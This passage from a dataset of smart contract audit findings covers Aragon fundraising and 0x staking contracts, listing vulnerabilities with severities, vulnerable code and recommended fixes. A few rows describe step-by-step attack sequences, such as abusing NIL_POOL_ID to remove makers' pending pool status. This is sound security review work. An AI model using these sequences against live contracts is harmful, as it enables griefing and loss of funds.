address(reserve).balance : ERC20(\\_token).staticBalanceOf(reserve);\\n uint256 flow = (\\_currentBatchId().sub(lastTappedAmountUpdates[\\_token])).mul(rates[\\_token]);\\n uint256 tappedAmount = tappedAmounts[\\_token].add(flow);\\n /\\*\\*\\n \\* whatever happens enough collateral should be\\n \\* kept in the reserve pool to guarantee that\\n \\* its balance is kept above the floor once\\n \\* all pending sell orders are claimed\\n \\*/\\n\\n /\\*\\*\\n \\* the reserve's balance is already below the balance to be kept\\n \\* the tapped amount should be reset to zero\\n \\*/\\n if (balance <= toBeKept) {\\n return 0;\\n }\\n\\n /\\*\\*\\n \\* the reserve's balance minus the upcoming tap flow would be below the balance to be kept\\n \\* the flow should be reduced to balance - toBeKept\\n \\*/\\n if (balance <= toBeKept.add(tappedAmount)) {\\n return balance.sub(toBeKept);\\n }\\n\\n /\\*\\*\\n \\* the reserve's balance minus the upcoming flow is above the balance to be kept\\n \\* the flow can be added to the tapped amount\\n \\*/\\n return tappedAmount;\\n}\\n```\\n\\nThat means that the amount that beneficiary can withdraw has just decreased, which should not be possible.",Ensure that `tappedAmount` cannot be decreased once updated.,,"```\\nfunction \\_poolBalanceIsSufficient(address \\_collateral) internal view returns (bool) {\\n return controller.balanceOf(address(reserve), \\_collateral) >= collateralsToBeClaimed[\\_collateral];\\n}\\n```\\n" +Presale - contributionToken double cast and invalid comparison,medium,"The Presale can be configured to accept `ETH` or a valid `ERC20` `token`. This `token` is stored as an `ERC20` contract type in the state variable `contributionToken`. It is then directly compared to constant `ETH` which is `address(0x0)` in various locations. 
Additionally, the `_transfer` function double casts the `token` to `ERC20` if the `contributionToken` is passed as an argument.\\n`contribute` - invalid comparison of contract type against `address(0x00)`. Even though this is accepted in solidity `<0.5.0` it is going to raise a compiler error with newer versions (>=0.5.0).\\n```\\nfunction contribute(address \\_contributor, uint256 \\_value) external payable nonReentrant auth(CONTRIBUTE\\_ROLE) {\\n require(state() == State.Funding, ERROR\\_INVALID\\_STATE);\\n\\n if (contributionToken == ETH) {\\n require(msg.value == \\_value, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n } else {\\n require(msg.value == 0, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n }\\n```\\n\\n`_transfer` - double cast `token` to `ERC20` if it is the contribution `token`.\\n```\\nrequire(ERC20(\\_token).safeTransfer(\\_to, \\_amount), ERROR\\_TOKEN\\_TRANSFER\\_REVERTED);\\n```\\n",`contributionToken` can either be `ETH` or a valid `ERC20` contract address. It is therefore recommended to store the token as an address type instead of the more precise contract type to resolve the double cast and the invalid contract type to address comparison or cast the `ERC20` type to `address()` before comparison.,,"```\\nfunction contribute(address \\_contributor, uint256 \\_value) external payable nonReentrant auth(CONTRIBUTE\\_ROLE) {\\n require(state() == State.Funding, ERROR\\_INVALID\\_STATE);\\n\\n if (contributionToken == ETH) {\\n require(msg.value == \\_value, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n } else {\\n require(msg.value == 0, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n }\\n```\\n" +Fees are not returned for buy orders if a batch is canceled Won't Fix,medium,"Every trader pays fees on each buy order and transfers it directly to the `beneficiary`.\\n```\\nuint256 fee = \\_value.mul(buyFeePct).div(PCT\\_BASE);\\nuint256 value = \\_value.sub(fee);\\n\\n// collect fee and collateral\\nif (fee > 0) {\\n \\_transfer(\\_buyer, beneficiary, \\_collateral, 
fee);\\n}\\n\\_transfer(\\_buyer, address(reserve), \\_collateral, value);\\n```\\n\\nIf the batch is canceled, fees are not returned to the traders because there is no access to the beneficiary account.\\nAdditionally, fees are returned to traders for all the sell orders if the batch is canceled.",Consider transferring fees to a beneficiary only after the batch is over.,,"```\\nuint256 fee = \\_value.mul(buyFeePct).div(PCT\\_BASE);\\nuint256 value = \\_value.sub(fee);\\n\\n// collect fee and collateral\\nif (fee > 0) {\\n \\_transfer(\\_buyer, beneficiary, \\_collateral, fee);\\n}\\n\\_transfer(\\_buyer, address(reserve), \\_collateral, value);\\n```\\n" +Tap - Controller should not be updateable,medium,"Similar to the issue 6.11, `Tap` allows updating the `Controller` contract it is using. The permission is currently not assigned in the `FundraisingMultisigTemplate` but might be used in custom deployments.\\n```\\n/\\*\\*\\n \\* @notice Update controller to `\\_controller`\\n \\* @param \\_controller The address of the new controller contract\\n\\*/\\nfunction updateController(IAragonFundraisingController \\_controller) external auth(UPDATE\\_CONTROLLER\\_ROLE) {\\n require(isContract(\\_controller), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateController(\\_controller);\\n}\\n```\\n","To avoid inconsistencies, we suggest to remove this functionality and provide a guideline on how to safely upgrade components of the system.",,"```\\n/\\*\\*\\n \\* @notice Update controller to `\\_controller`\\n \\* @param \\_controller The address of the new controller contract\\n\\*/\\nfunction updateController(IAragonFundraisingController \\_controller) external auth(UPDATE\\_CONTROLLER\\_ROLE) {\\n require(isContract(\\_controller), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateController(\\_controller);\\n}\\n```\\n" +Tap - reserve can be updated in Tap but not in MarketMaker or Controller,medium,"The address of the pool/reserve contract can be updated in `Tap` if someone owns 
the `UPDATE_RESERVE_ROLE` permission. The permission is currently not assigned in the template.\\nThe reserve is being referenced by multiple Contracts. `Tap` interacts with it to transfer funds to the beneficiary, `Controller` adds new protected tokens, and `MarketMaker` transfers funds when someone sells their Shareholder token.\\nUpdating reserve only in `Tap` is inconsistent with the system as the other contracts are still referencing the old reserve unless they are updated via the Aragon Application update mechanisms.\\n```\\n/\\*\\*\\n \\* @notice Update reserve to `\\_reserve`\\n \\* @param \\_reserve The address of the new reserve [pool] contract\\n\\*/\\nfunction updateReserve(Vault \\_reserve) external auth(UPDATE\\_RESERVE\\_ROLE) {\\n require(isContract(\\_reserve), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateReserve(\\_reserve);\\n}\\n```\\n",Remove the possibility to update reserve in `Tap` to keep the system consistent. Provide information about update mechanisms in case the reserve needs to be updated for all components.,,"```\\n/\\*\\*\\n \\* @notice Update reserve to `\\_reserve`\\n \\* @param \\_reserve The address of the new reserve [pool] contract\\n\\*/\\nfunction updateReserve(Vault \\_reserve) external auth(UPDATE\\_RESERVE\\_ROLE) {\\n require(isContract(\\_reserve), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateReserve(\\_reserve);\\n}\\n```\\n" +Presale can be opened earlier than initially assigned date,medium,"There are 2 ways how presale opening date can be assigned. 
Either it's defined on initialization or the presale will start when `open()` function is executed.\\n```\\nif (\\_openDate != 0) {\\n \\_setOpenDate(\\_openDate);\\n}\\n```\\n\\nThe problem is that even if `openDate` is assigned to some non-zero date, it can still be opened earlier by calling `open()` function.\\n```\\nfunction open() external auth(OPEN\\_ROLE) {\\n require(state() == State.Pending, ERROR\\_INVALID\\_STATE);\\n\\n \\_open();\\n}\\n```\\n",Require that `openDate` is not set (0) when someone manually calls the `open()` function.,,```\\nif (\\_openDate != 0) {\\n \\_setOpenDate(\\_openDate);\\n}\\n```\\n +Presale - should not allow zero value contributions,low,"The Presale accepts zero value contributions emitting a contribution event if none of the Aragon components (TokenManager, MinimeToken) raises an exception.\\n```\\nfunction contribute(address \\_contributor, uint256 \\_value) external payable nonReentrant auth(CONTRIBUTE\\_ROLE) {\\n require(state() == State.Funding, ERROR\\_INVALID\\_STATE);\\n\\n if (contributionToken == ETH) {\\n require(msg.value == \\_value, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n } else {\\n require(msg.value == 0, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n }\\n\\n \\_contribute(\\_contributor, \\_value);\\n}\\n```\\n",Reject zero value `ETH` or `ERC20` contributions.,,"```\\nfunction contribute(address \\_contributor, uint256 \\_value) external payable nonReentrant auth(CONTRIBUTE\\_ROLE) {\\n require(state() == State.Funding, ERROR\\_INVALID\\_STATE);\\n\\n if (contributionToken == ETH) {\\n require(msg.value == \\_value, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n } else {\\n require(msg.value == 0, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n }\\n\\n \\_contribute(\\_contributor, \\_value);\\n}\\n```\\n" +FundraisingMultisigTemplate - should use BaseTemplate._createPermissionForTemplate() to assign permissions to itself,low,"The template temporarily assigns permissions to itself to be able to configure parts of the 
system. This can either be done by calling `acl.createPermission(address(this), app, role, manager)` or by using a distinct method provided with the DAO-Templates BaseTemplate `_createPermissionForTemplate`.\\nWe suggest that in order to make it clear that permissions are assigned to the template and make it easier to audit that permissions are either revoked or transferred before the DAO is transferred to the new user, the method provided and used with the default Aragon DAO-Templates should be used.\\nuse `createPermission` if permissions are assigned to an entity other than the template contract.\\nuse `_createPermissionForTemplate` when creating permissions for the template contract.\\n```\\n// create and grant ADD\\_PROTECTED\\_TOKEN\\_ROLE to this template\\nacl.createPermission(this, controller, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), this);\\n```\\n\\nSidenote: pass `address(this)` instead of the contract instance to `createPermission`.",Resolution\\nFixed with AragonBlack/fundraising@dd153e0.\\nUse `BaseTemplate._createPermissionForTemplate` to assign permissions to the template.,,"```\\n// create and grant ADD\\_PROTECTED\\_TOKEN\\_ROLE to this template\\nacl.createPermission(this, controller, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), this);\\n```\\n" +FundraisingMultisigTemplate - misleading comments,low,"The comment mentions ADD_PROTECTED_TOKEN_ROLE but permissions for `ADD_COLLATERAL_TOKEN_ROLE` are created.\\n```\\n// create and grant ADD\\_PROTECTED\\_TOKEN\\_ROLE to this 
template\\nacl.createPermission(this, controller, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), this);\\n```\\n",`ADD_PROTECTED_TOKEN_ROLE` in the comment should be `ADD_COLLATERAL_TOKEN_ROLE`.,,"```\\n// create and grant ADD\\_PROTECTED\\_TOKEN\\_ROLE to this 
template\\nacl.createPermission(this, controller, controller.ADD\\_COLLATERAL\\_TOKEN\\_ROLE(), this);\\n```\\n" +FundraisingMultisigTemplate - unnecessary cast to address,low,"The addresses of DAI (argument `address` _dai) and ANT (argument `address` _ant) are unnecessarily cast to `address`.\\n```\\nconstructor(\\n DAOFactory \\_daoFactory,\\n ENS \\_ens,\\n MiniMeTokenFactory \\_miniMeFactory,\\n IFIFSResolvingRegistrar \\_aragonID,\\n address \\_dai,\\n address \\_ant\\n)\\n BaseTemplate(\\_daoFactory, \\_ens, \\_miniMeFactory, \\_aragonID)\\n public\\n{\\n \\_ensureAragonIdIsValid(\\_aragonID);\\n \\_ensureMiniMeFactoryIsValid(\\_miniMeFactory);\\n \\_ensureTokenIsContractOrETH(\\_dai);\\n \\_ensureTokenIsContractOrETH(\\_ant);\\n\\n collaterals.push(address(\\_dai));\\n collaterals.push(address(\\_ant));\\n}\\n```\\n","Both arguments are already of type `address`, therefore remove the explicit cast to `address()` when pushing to the `collaterals` array.",,"```\\nconstructor(\\n DAOFactory \\_daoFactory,\\n ENS \\_ens,\\n MiniMeTokenFactory \\_miniMeFactory,\\n IFIFSResolvingRegistrar \\_aragonID,\\n address \\_dai,\\n address \\_ant\\n)\\n BaseTemplate(\\_daoFactory, \\_ens, \\_miniMeFactory, \\_aragonID)\\n public\\n{\\n \\_ensureAragonIdIsValid(\\_aragonID);\\n \\_ensureMiniMeFactoryIsValid(\\_miniMeFactory);\\n \\_ensureTokenIsContractOrETH(\\_dai);\\n \\_ensureTokenIsContractOrETH(\\_ant);\\n\\n collaterals.push(address(\\_dai));\\n collaterals.push(address(\\_ant));\\n}\\n```\\n" +FundraisingMultisigTemplate - DAI/ANT token address cannot be zero,low,"The fundraising template is configured with the `DAI` and `ANT` token address upon deployment and checks if the provided addresses are valid. The check performed is `_ensureTokenIsContractOrETH()` which allows the `address(0)` (constant for ETH) for the token contracts. 
However, `address(0)` is not a valid option for either `DAI` or `ANT` and the contract expects a valid token address to be provided as the deployment of a new DAO will have unexpected results (collateral `ETH` is added instead of an ERC20 token) or fail (DAI == `ANT` == 0x0).\\n```\\n\\_ensureTokenIsContractOrETH(\\_dai);\\n\\_ensureTokenIsContractOrETH(\\_ant);\\n```\\n\\n```\\n function \\_ensureTokenIsContractOrETH(address \\_token) internal view returns (bool) {\\n require(isContract(\\_token) || \\_token == ETH, ERROR\\_BAD\\_SETTINGS);\\n}\\n```\\n",Resolution\\nFixed with AragonBlack/fundraising@da561ce.\\nUse `isContract()` instead of `_ensureTokenIsContractOrETH()` and optionally require that `collateral[0] != collateral[1]` as an additional check to prevent that the fundraising template is being deployed with an invalid configuration.,,```\\n\\_ensureTokenIsContractOrETH(\\_dai);\\n\\_ensureTokenIsContractOrETH(\\_ant);\\n```\\n +Anyone can remove a maker's pending pool join status,high,"Using behavior described in https://github.com/ConsenSys/0x-v3-staking-audit-2019-10/issues/11, it is possible to delete the pending join status of any maker in any pool by passing in `NIL_POOL_ID` to `removeMakerFromStakingPool`. Note that the attacker in the following example must not be a confirmed member of any pool:\\nThe attacker calls `addMakerToStakingPool(NIL_POOL_ID, makerAddress)`. In this case, `makerAddress` can be almost any address, as long as it has not called `joinStakingPoolAsMaker` (an easy example is address(0)). The key goal of this call is to increment the number of makers in pool 0:\\n```\\n\\_poolById[poolId].numberOfMakers = uint256(pool.numberOfMakers).safeAdd(1).downcastToUint32();\\n```\\n\\nThe attacker calls `removeMakerFromStakingPool(NIL_POOL_ID, targetAddress)`. This function queries `getStakingPoolIdOfMaker(targetAddress)` and compares it to the passed-in pool id. 
Because the target is an unconfirmed maker, their staking pool id is NIL_POOL_ID:\\n```\\nbytes32 makerPoolId = getStakingPoolIdOfMaker(makerAddress);\\nif (makerPoolId != poolId) {\\n LibRichErrors.rrevert(LibStakingRichErrors.MakerPoolAssignmentError(\\n LibStakingRichErrors.MakerPoolAssignmentErrorCodes.MakerAddressNotRegistered,\\n makerAddress,\\n makerPoolId\\n ));\\n}\\n```\\n\\nThe check passes, and the target's `_poolJoinedByMakerAddress` struct is deleted. Additionally, the number of makers in pool 0 is decreased:\\n```\\ndelete \\_poolJoinedByMakerAddress[makerAddress];\\n\\_poolById[poolId].numberOfMakers = uint256(\\_poolById[poolId].numberOfMakers).safeSub(1).downcastToUint32();\\n```\\n\\nThis can be used to prevent any makers from being confirmed into a pool.",See `issue 5.6`.,,```\\n\\_poolById[poolId].numberOfMakers = uint256(pool.numberOfMakers).safeAdd(1).downcastToUint32();\\n```\\n +MixinParams.setParams bypasses safety checks made by standard StakingProxy upgrade path.,medium,"The staking contracts use a set of configurable parameters to determine the behavior of various parts of the system. The parameters dictate the duration of epochs, the ratio of delegated stake weight vs operator stake, the minimum pool stake, and the Cobb-Douglas numerator and denominator. 
These parameters can be configured in two ways:\\n```\\n// Call `init()` on the staking contract to initialize storage.\\n(bool didInitSucceed, bytes memory initReturnData) = stakingContract.delegatecall(\\n abi.encodeWithSelector(IStorageInit(0).init.selector)\\n);\\nif (!didInitSucceed) {\\n assembly {\\n revert(add(initReturnData, 0x20), mload(initReturnData))\\n }\\n}\\n \\n// Assert initialized storage values are valid\\n\\_assertValidStorageParams();\\n```\\n\\nAn authorized address can call `MixinParams.setParams` at any time and set the contract's parameters to arbitrary values.\\nThe latter method introduces the possibility of setting unsafe or nonsensical values for the contract parameters: `epochDurationInSeconds` can be set to 0, `cobbDouglassAlphaNumerator` can be larger than `cobbDouglassAlphaDenominator`, `rewardDelegatedStakeWeight` can be set to a value over 100% of the staking reward, and more.\\nNote, too, that by using `MixinParams.setParams` to set all parameters to 0, the `Staking` contract can be re-initialized by way of `Staking.init`. Additionally, it can be re-attached by way of `StakingProxy.attachStakingContract`, as the delegatecall to `Staking.init` will succeed.",Resolution\\nThis is fixed in 0xProject/0x-monorepo#2279. 
Now the parameter validity is asserted in `setParams()`.\\nEnsure that calls to `setParams` check that the provided values are within the same range currently enforced by the proxy.,,"```\\n// Call `init()` on the staking contract to initialize storage.\\n(bool didInitSucceed, bytes memory initReturnData) = stakingContract.delegatecall(\\n abi.encodeWithSelector(IStorageInit(0).init.selector)\\n);\\nif (!didInitSucceed) {\\n assembly {\\n revert(add(initReturnData, 0x20), mload(initReturnData))\\n }\\n}\\n \\n// Assert initialized storage values are valid\\n\\_assertValidStorageParams();\\n```\\n" +Authorized addresses can indefinitely stall ZrxVaultBackstop catastrophic failure mode,medium,"The `ZrxVaultBackstop` contract was added to allow anyone to activate the staking system's “catastrophic failure” mode if the `StakingProxy` is in “read-only” mode for at least 40 days. To enable this behavior, the `StakingProxy` contract was modified to track the last timestamp at which “read-only” mode was activated. 
This is done by way of StakingProxy.setReadOnlyMode:\\n```\\n/// @dev Set read-only mode (state cannot be changed).\\nfunction setReadOnlyMode(bool shouldSetReadOnlyMode)\\n external\\n onlyAuthorized\\n{\\n // solhint-disable-next-line not-rely-on-time\\n uint96 timestamp = block.timestamp.downcastToUint96();\\n if (shouldSetReadOnlyMode) {\\n stakingContract = readOnlyProxy;\\n readOnlyState = IStructs.ReadOnlyState({\\n isReadOnlyModeSet: true,\\n lastSetTimestamp: timestamp\\n });\\n```\\n\\nBecause the timestamp is updated even if “read-only” mode is already active, any authorized address can prevent `ZrxVaultBackstop` from activating catastrophic failure mode by repeatedly calling `setReadOnlyMode`.","If “read-only” mode is already active, `setReadOnlyMode(true)` should result in a no-op.",,"```\\n/// @dev Set read-only mode (state cannot be changed).\\nfunction setReadOnlyMode(bool shouldSetReadOnlyMode)\\n external\\n onlyAuthorized\\n{\\n // solhint-disable-next-line not-rely-on-time\\n uint96 timestamp = block.timestamp.downcastToUint96();\\n if (shouldSetReadOnlyMode) {\\n stakingContract = readOnlyProxy;\\n readOnlyState = IStructs.ReadOnlyState({\\n isReadOnlyModeSet: true,\\n lastSetTimestamp: timestamp\\n });\\n```\\n" +Pool 0 can be used to temporarily prevent makers from joining another pool,medium,"`removeMakerFromStakingPool` reverts if the number of makers currently in the pool is 0, due to `safeSub` catching an underflow:\\n```\\n\\_poolById[poolId].numberOfMakers = uint256(\\_poolById[poolId].numberOfMakers).safeSub(1).downcastToUint32();\\n```\\n\\nBecause of this, edge behavior described in issue 5.6 can allow an attacker to temporarily prevent makers from joining a pool:\\nThe attacker calls `addMakerToStakingPool(NIL_POOL_ID, victimAddress)`. 
This sets the victim's `MakerPoolJoinStatus.confirmed` field to `true` and increases the number of makers in pool 0 to 1:\\n```\\npoolJoinStatus = IStructs.MakerPoolJoinStatus({\\n poolId: poolId,\\n confirmed: true\\n});\\n\\_poolJoinedByMakerAddress[makerAddress] = poolJoinStatus;\\n\\_poolById[poolId].numberOfMakers = uint256(pool.numberOfMakers).safeAdd(1).downcastToUint32();\\n```\\n\\nThe attacker calls `removeMakerFromStakingPool(NIL_POOL_ID, randomAddress)`. The net effect of this call simply decreases the number of makers in pool 0 by 1, back to 0:\\n```\\ndelete \\_poolJoinedByMakerAddress[makerAddress];\\n\\_poolById[poolId].numberOfMakers = uint256(\\_poolById[poolId].numberOfMakers).safeSub(1).downcastToUint32();\\n```\\n\\nTypically, the victim should be able to remove themselves from pool 0 by calling `removeMakerFromStakingPool(NIL_POOL_ID, victimAddress)`, but because the attacker can set the pool's number of makers to 0, the aforementioned underflow causes this call to fail. The victim must first understand what is happening in `MixinStakingPool` before they are able to remedy the situation:\\nThe victim must call `addMakerToStakingPool(NIL_POOL_ID, randomAddress2)` to increase pool 0's number of makers back to 1.\\nThe victim can now call `removeMakerFromStakingPool(NIL_POOL_ID, victimAddress)`, and remove their confirmed status.\\nAdditionally, if the victim in question currently has a pending join, the attacker can use issue 5.1 to first remove their pending status before locking them in pool 0.",See issue 5.1.,,```\\n\\_poolById[poolId].numberOfMakers = uint256(\\_poolById[poolId].numberOfMakers).safeSub(1).downcastToUint32();\\n```\\n +Recommendation: Fix weak assertions in MixinStakingPool stemming from use of NIL_POOL_ID,medium,"The modifier `onlyStakingPoolOperatorOrMaker(poolId)` is used to authorize actions taken on a given pool. The sender must be either the operator or a confirmed maker of the pool in question. 
However, the modifier queries `getStakingPoolIdOfMaker(maker)`, which returns `NIL_POOL_ID` if the maker's `MakerPoolJoinStatus` struct is not confirmed. This implicitly makes anyone a maker of the nonexistent “pool 0”:\\n```\\nfunction getStakingPoolIdOfMaker(address makerAddress)\\n public\\n view\\n returns (bytes32)\\n{\\n IStructs.MakerPoolJoinStatus memory poolJoinStatus = \\_poolJoinedByMakerAddress[makerAddress];\\n if (poolJoinStatus.confirmed) {\\n return poolJoinStatus.poolId;\\n } else {\\n return NIL\\_POOL\\_ID;\\n }\\n}\\n```\\n\\n`joinStakingPoolAsMaker(poolId)` makes no existence checks on the provided pool id, and allows makers to become pending makers in nonexistent pools.\\n`addMakerToStakingPool(poolId, maker)` makes no existence checks on the provided pool id, allowing makers to be added to nonexistent pools (as long as the sender is an operator or maker in the pool).","Avoid use of `0x00...00` for `NIL_POOL_ID`. Instead, use `2**256 - 1`.\\nImplement stronger checks for pool existence. 
Each time a pool id is supplied, it should be checked that the pool id is between 0 and `nextPoolId`.\\n`onlyStakingPoolOperatorOrMaker` should revert if `poolId` == `NIL_POOL_ID` or if `poolId` is not in the valid range: (0, nextPoolId).",,```\\nfunction getStakingPoolIdOfMaker(address makerAddress)\\n public\\n view\\n returns (bytes32)\\n{\\n IStructs.MakerPoolJoinStatus memory poolJoinStatus = \\_poolJoinedByMakerAddress[makerAddress];\\n if (poolJoinStatus.confirmed) {\\n return poolJoinStatus.poolId;\\n } else {\\n return NIL\\_POOL\\_ID;\\n }\\n}\\n```\\n +LibFixedMath functions fail to catch a number of overflows,medium,"The `__add()`, `__mul()`, and `__div()` functions perform arithmetic on 256-bit signed integers, and they all miss some specific overflows.\\nAddition Overflows\\n```\\n/// @dev Adds two numbers, reverting on overflow.\\nfunction \\_add(int256 a, int256 b) private pure returns (int256 c) {\\n c = a + b;\\n if (c > 0 && a < 0 && b < 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.SUBTRACTION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n if (c < 0 && a > 0 && b > 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.ADDITION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n}\\n```\\n\\nThe two overflow conditions it tests for are:\\nAdding two positive numbers shouldn't result in a negative number.\\nAdding two negative numbers shouldn't result in a positive number.\\n`__add(-2**255, -2**255)` returns `0` without reverting because the overflow didn't match either of the above conditions.\\nMultiplication Overflows\\n```\\n/// @dev Returns the multiplication two numbers, reverting on overflow.\\nfunction \\_mul(int256 a, int256 b) private pure returns (int256 c) {\\n if (a == 0) {\\n return 0;\\n }\\n c = a \\* b;\\n if (c / a != b) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n 
LibFixedMathRichErrors.BinOpErrorCodes.MULTIPLICATION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n}\\n```\\n\\nThe function checks via division for most types of overflows, but it fails to catch one particular case. `__mul(-2**255, -1)` returns `-2**255` without error.\\nDivision Overflows\\n```\\n/// @dev Returns the division of two numbers, reverting on division by zero.\\nfunction \\_div(int256 a, int256 b) private pure returns (int256 c) {\\n if (b == 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.DIVISION\\_BY\\_ZERO,\\n a,\\n b\\n ));\\n }\\n c = a / b;\\n}\\n```\\n\\nIt does not check for overflow. Due to this, `__div(-2**255, -1)` erroneously returns `-2**255`.","For addition, the specific case of `__add(-2**255, -2**255)` can be detected by using a `>= 0` check instead of `> 0`, but the below seems like a clearer check for all cases:\\n```\\n// if b is negative, then the result should be less than a\\nif (b < 0 && c >= a) { /\\* subtraction overflow \\*/ }\\n\\n// if b is positive, then the result should be greater than a\\nif (b > 0 && c <= a) { /\\* addition overflow \\*/ }\\n```\\n\\nFor multiplication and division, the specific values of `-2**255` and `-1` are the only missing cases, so that can be explicitly checked in the `__mul()` and `__div()` functions.",,"```\\n/// @dev Adds two numbers, reverting on overflow.\\nfunction \\_add(int256 a, int256 b) private pure returns (int256 c) {\\n c = a + b;\\n if (c > 0 && a < 0 && b < 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.SUBTRACTION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n if (c < 0 && a > 0 && b > 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.ADDITION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n}\\n```\\n" +Misleading MoveStake event when moving stake from UNDELEGATED to UNDELEGATED,low,"Although moving stake between the same status 
(UNDELEGATED <=> UNDELEGATED) should be a no-op, calls to `moveStake` succeed even for invalid `amount` and nonsensical `poolId`. The resulting `MoveStake` event can log garbage, potentially confusing those observing events.\\nWhen moving between `UNDELEGATED` and `UNDELEGATED`, each check and function call results in a no-op, save the final event:\\nNeither `from` nor `to` are `StakeStatus.DELEGATED`, so these checks are passed:\\n```\\nif (from.status == IStructs.StakeStatus.DELEGATED) {\\n \\_undelegateStake(\\n from.poolId,\\n staker,\\n amount\\n );\\n}\\n \\nif (to.status == IStructs.StakeStatus.DELEGATED) {\\n \\_delegateStake(\\n to.poolId,\\n staker,\\n amount\\n );\\n}\\n```\\n\\nThe primary state changing function, `_moveStake`, immediately returns because the `from` and `to` balance pointers are equivalent:\\n```\\nif (\\_arePointersEqual(fromPtr, toPtr)) {\\n return;\\n}\\n```\\n\\nFinally, the `MoveStake` event is invoked, which can log completely invalid values for `amount`, `from.poolId`, and to.poolId:\\n```\\nemit MoveStake(\\n staker,\\n amount,\\n uint8(from.status),\\n from.poolId,\\n uint8(to.status),\\n to.poolId\\n);\\n```\\n","If `amount` is 0 or if moving between `UNDELEGATED` and `UNDELEGATED`, this function should no-op or revert. An explicit check for this case should be made near the start of the function.",,"```\\nif (from.status == IStructs.StakeStatus.DELEGATED) {\\n \\_undelegateStake(\\n from.poolId,\\n staker,\\n amount\\n );\\n}\\n \\nif (to.status == IStructs.StakeStatus.DELEGATED) {\\n \\_delegateStake(\\n to.poolId,\\n staker,\\n amount\\n );\\n}\\n```\\n" +Remove unneeded fields from StoredBalance and Pool structs,low,"Resolution\\nThis is fixed in 0xProject/0x-monorepo#2248. 
As part of a larger refactor, these fields were removed.\\nBoth structs have fields that are only written to, and never read:\\nStoredBalance.isInitialized:\\n```\\nbool isInitialized;\\n```\\n\\nPool.initialized:\\n```\\nbool initialized;\\n```\\n",The unused fields should be removed.,,```\\nbool isInitialized;\\n```\\n +Pool IDs can just be incrementing integers,low,"Pool IDs are currently `bytes32` values that increment by `2**128`. After discussion with the development team, it seems that this was in preparation for a feature that was ultimately not used. Pool IDs should instead just be incrementing integers.\\n```\\n// The upper 16 bytes represent the pool id, so this would be pool id 1. See MixinStakinPool for more information.\\nbytes32 constant internal INITIAL\\_POOL\\_ID = 0x0000000000000000000000000000000100000000000000000000000000000000;\\n\\n// The upper 16 bytes represent the pool id, so this would be an increment of 1. See MixinStakinPool for more information.\\nuint256 constant internal POOL\\_ID\\_INCREMENT\\_AMOUNT = 0x0000000000000000000000000000000100000000000000000000000000000000;\\n```\\n\\n```\\n/// @dev Computes the unique id that comes after the input pool id.\\n/// @param poolId Unique id of pool.\\n/// @return Next pool id after input pool.\\nfunction \\_computeNextStakingPoolId(bytes32 poolId)\\n internal\\n pure\\n returns (bytes32)\\n{\\n return bytes32(uint256(poolId).safeAdd(POOL\\_ID\\_INCREMENT\\_AMOUNT));\\n}\\n```\\n",Resolution\\nThis is fixed in 0xProject/0x-monorepo#2250. Pool IDs now start at 1 and increment by 1 each time.\\nMake pool IDs `uint256` values and simply add 1 to generate the next ID.,,"```\\n// The upper 16 bytes represent the pool id, so this would be pool id 1. See MixinStakinPool for more information.\\nbytes32 constant internal INITIAL\\_POOL\\_ID = 0x0000000000000000000000000000000100000000000000000000000000000000;\\n\\n// The upper 16 bytes represent the pool id, so this would be an increment of 1. 
See MixinStakinPool for more information.\\nuint256 constant internal POOL\\_ID\\_INCREMENT\\_AMOUNT = 0x0000000000000000000000000000000100000000000000000000000000000000;\\n```\\n" +LibProxy.proxyCall() may overwrite important memory,low,"`LibProxy.proxyCall()` copies from call data to memory, starting at address 0:\\n```\\nassembly {\\n // store selector of destination function\\n let freeMemPtr := 0\\n if gt(customEgressSelector, 0) {\\n mstore(0x0, customEgressSelector)\\n freeMemPtr := add(freeMemPtr, 4)\\n }\\n\\n // adjust the calldata offset, if we should ignore the selector\\n let calldataOffset := 0\\n if gt(ignoreIngressSelector, 0) {\\n calldataOffset := 4\\n }\\n\\n // copy calldata to memory\\n calldatacopy(\\n freeMemPtr,\\n calldataOffset,\\n calldatasize()\\n )\\n```\\n\\nThe first 64 bytes of memory are treated as “scratch space” by the Solidity compiler. Writing beyond that point is dangerous, as it will overwrite the free memory pointer and the “zero slot” which is where length-0 arrays point.\\nAlthough the current callers of `proxyCall()` don't appear to use any memory after calling `proxyCall()`, future changes to the code may introduce very serious and subtle bugs due to this unsafe handling of memory.",Use the actual free memory pointer to determine where it's safe to write to memory.,,"```\\nassembly {\\n // store selector of destination function\\n let freeMemPtr := 0\\n if gt(customEgressSelector, 0) {\\n mstore(0x0, customEgressSelector)\\n freeMemPtr := add(freeMemPtr, 4)\\n }\\n\\n // adjust the calldata offset, if we should ignore the selector\\n let calldataOffset := 0\\n if gt(ignoreIngressSelector, 0) {\\n calldataOffset := 4\\n 